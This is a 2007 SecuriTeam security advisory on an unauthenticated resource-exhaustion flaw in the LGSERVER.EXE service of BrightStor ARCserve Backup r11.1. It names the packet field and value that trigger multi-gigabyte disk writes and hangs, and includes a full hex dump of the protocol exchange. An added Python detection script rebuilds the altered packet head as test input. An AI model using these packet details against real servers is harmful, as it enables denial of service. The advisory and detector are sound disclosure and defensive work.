[NT] Unauthenticated Resource Exhaustion Mobile BackupService
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 4 Feb 2007 17:08:35 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Unauthenticated Resource Exhaustion Mobile BackupService
------------------------------------------------------------------------
SUMMARY
"BrightStor ARCserve Backup for Laptops & Desktops reduces business risk
by providing a fast, automatic and transparent solution for backing up and
restoring data on remote and mobile Windows-based PCs."
(http://www3.ca.com/solutions/Product.aspx?ID=263) A vulnerability in
Mobile BackupService allows an unauthenticated client to make the program
write large files to the disk, or generally cause it to become unresponsive.
DETAILS
Vulnerable Systems:
* BrightStor ARCserve Backup for Laptops & Desktops version r11.1
By sending a specially crafted series of packets to the LGSERVER.EXE
process that listens on TCP port 2200, it is possible to cause
LGSERVER.EXE to write very large files to the system disk. In addition,
the LGSERVER.EXE process becomes unresponsive until the file has been
written.
On every authentication attempt to LGSERVER.EXE, a file is created within
D:\CA_BABLDdata\Server\data\transfer. The file has a .USX extension and a
name of the form RWXXX.usx, where each X is a hexadecimal digit (0-9 or
A-F).
During the negotiation, the DWORD at hex offsets 0x15 - 0x18 of the third
packet normally holds the value 0x00 0x00 0x00 0x00 and is followed by
CoreDataDB.
When this packet is sent, its contents are written to the USX file.
However, if a DWORD value of 0xff 0xff 0xff 0x7f is passed at offsets
0x15 - 0x18, an additional 2,096,153KB of NULLs is written to the USX file.
Sample Conversation:
Client:- (Packet 1)
Raw Data
4e 3d 2c 1b 00 00 00 00 00 00 00 00 00 00 00 00 (N=, )
00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 ( )
Server:-
Raw Data
4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )
Server:-
Raw Data
4e 3d 2c 1b 00 00 00 00 ff 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )
Client:- (Packet 2)
Raw Data
4e 3d 2c 1b 00 00 00 00 02 00 00 00 00 00 00 00 (N=, )
06 00 00 00 ce 03 00 00 52 57 31 42 34 00 ( RW1B4 )
Server:-
Raw Data
4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )
Client:- (Packet 3)
Raw Data
4e 3d 2c 1b 00 00 00 00 03 00 00 00 00 00 00 00 (N=, )
ce 03 00 00 00 00 00 00 43 6f 72 65 44 61 74 61 ( CoreData)
44 42 00 00 01 00 00 00 00 00 0a 00 ce 03 00 00 (DB )
00 00 00 00 01 00 00 00 10 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 02 00 00 00 00 00 00 4a 00 00 00 00 00 ( J )
00 01 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 ( J )
00 00 4a 02 00 00 00 00 00 00 50 00 00 00 00 00 ( J P )
00 01 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 9a 02 00 00 00 00 00 00 52 00 00 00 00 00 ( R )
00 01 ec 02 00 00 00 00 00 00 04 00 00 00 00 00 ( )
00 00 f0 02 00 00 00 00 00 00 52 00 00 00 00 00 ( R )
00 01 42 03 00 00 00 00 00 00 0c 00 00 00 00 00 ( B )
00 00 4e 03 00 00 00 00 00 00 14 00 00 00 00 00 ( N )
00 02 62 03 00 00 00 00 00 00 04 00 00 00 00 00 ( b )
00 00 66 03 00 00 00 00 00 00 12 00 00 00 00 00 ( f )
00 02 78 03 00 00 00 00 00 00 04 00 00 00 00 00 ( x )
00 00 7c 03 00 00 00 00 00 00 0e 00 00 00 00 00 ( | )
00 02 8a 03 00 00 00 00 00 00 17 00 00 00 00 00 ( )
00 00 a1 03 00 00 00 00 00 00 11 00 00 00 00 00 ( )
00 02 b2 03 00 00 00 00 00 00 1c 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ( )
00 00 01 00 00 00 03 00 00 00 f0 b4 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 01 00 00 00 04 00 00 00 06 00 43 6f 6e 66 ( Conf)
69 67 06 00 00 00 05 00 00 00 29 9f 07 00 00 00 (ig ) )
12 92 09 00 00 00 1f 9b 0b 00 00 00 57 92 0d 00 ( W )
00 00 b6 ad 0f 00 00 00 72 9c 00 00 00 00 00 00 ( r )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 03 00 00 00 06 00 00 00 08 00 55 73 65 72 ( User)
4e 61 6d 65 00 00 00 00 00 00 00 00 00 00 00 00 (Name )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 6d 61 72 6b 03 00 00 00 08 00 00 00 ( mark )
08 00 50 61 73 73 77 6f 72 64 00 00 00 00 00 00 ( Password )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 6a 86 fb b5 8d 2b ( j +)
1b a4 40 e1 b6 73 03 00 00 00 0a 00 00 00 0a 00 ( @ s )
55 73 65 72 53 74 61 74 75 73 11 00 00 00 03 00 (UserStatus )
00 00 0c 00 00 00 08 00 43 6f 64 65 50 61 67 65 ( CodePage)
e4 04 00 00 03 00 00 00 0e 00 00 00 04 00 48 6f ( Ho)
73 74 67 73 72 6c 2d 74 65 73 74 2e 67 73 72 6c (stgsrl-test.gsrl)
2d 74 65 73 74 2e 6e 65 74 03 00 00 00 10 00 00 (-test.net )
00 07 00 56 65 72 73 69 6f 6e 31 31 2e 31 2e 37 ( Version11.1.7)
34 32 3a 57 69 6e 64 6f 77 73 20 53 65 72 76 65 (42:Windows Serve)
72 20 32 30 30 33 (r 2003)
Client:- (Packet 4)
Raw Data
4e 3d 2c 1b 00 00 00 00 04 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )
Server:-
Raw Data
4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )
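An added example, not code from the advisory or the vendor: it scans a reassembled client-to-server byte stream from TCP port 2200 for messages carrying the CoreDataDB marker and reports any whose preceding DWORD is nonzero, which the advisory says is not the normal case. Assumptions: the advisory's 0x15 - 0x18 is one-based (zero-based 0x14-0x17, the four bytes directly before CoreDataDB in Packet 3) and the DWORD is little-endian; scan_stream and packet3_head are hypothetical names, and the sample bytes are constructed from the conversation above.

```python
import struct

MAGIC = bytes.fromhex("4e3d2c1b")  # first four bytes of every message in the sample
MARKER = b"CoreDataDB"             # string the advisory says follows the DWORD
FIELD_OFF = 0x14                   # assumption: advisory's 0x15-0x18 read as one-based
MARKER_OFF = FIELD_OFF + 4


def scan_stream(stream: bytes, limit: int = 0) -> list:
    """Return one finding per CoreDataDB message whose DWORD exceeds `limit`."""
    findings = []
    pos = stream.find(MAGIC)
    while pos != -1:
        end = pos + MARKER_OFF + len(MARKER)
        # Only messages with the marker in place are inspected; other message
        # types (Packet 2, for instance) legitimately carry data at 0x14.
        if stream[pos + MARKER_OFF:end] == MARKER:
            # Assumption: little-endian, so ff ff ff 7f reads as 0x7fffffff.
            (value,) = struct.unpack_from("<I", stream, pos + FIELD_OFF)
            if value > limit:
                findings.append({"offset": pos, "value": value})
        pos = stream.find(MAGIC, pos + 1)
    return findings


# Constructed samples: Packet 2 in full and the first 34 bytes of Packet 3.
PKT2 = bytes.fromhex("4e3d2c1b 00000000 02000000 00000000"
                     "06000000 ce030000 525731423400")
PKT3_PREFIX = bytes.fromhex("4e3d2c1b 00000000 03000000 00000000 ce030000")


def packet3_head(field: int) -> bytes:
    """Rebuild the start of Packet 3 with a chosen DWORD before the marker."""
    return PKT3_PREFIX + struct.pack("<I", field) + MARKER


if __name__ == "__main__":
    for label, field in (("as captured", 0), ("altered DWORD", 0x7FFFFFFF)):
        hits = scan_stream(PKT2 + packet3_head(field))
        print(label, [(h["offset"], hex(h["value"])) for h in hits])
```

The same comparison can be expressed as a byte-offset rule in a network IDS once the offset assumption has been confirmed against a capture from the deployed version.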
Fix Information:
http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp
Disclosure Timeline:
* Discovered: 19 June 2006
* Released: 19 June 2006
* Approved: 19 June 2006
* Reported: 22 June 2006
* Fixed: 23 January 2007
* Published: 30 January 2007
ADDITIONAL INFORMATION
The information has been provided by Mark <mark@xxxxxxxxxxx>.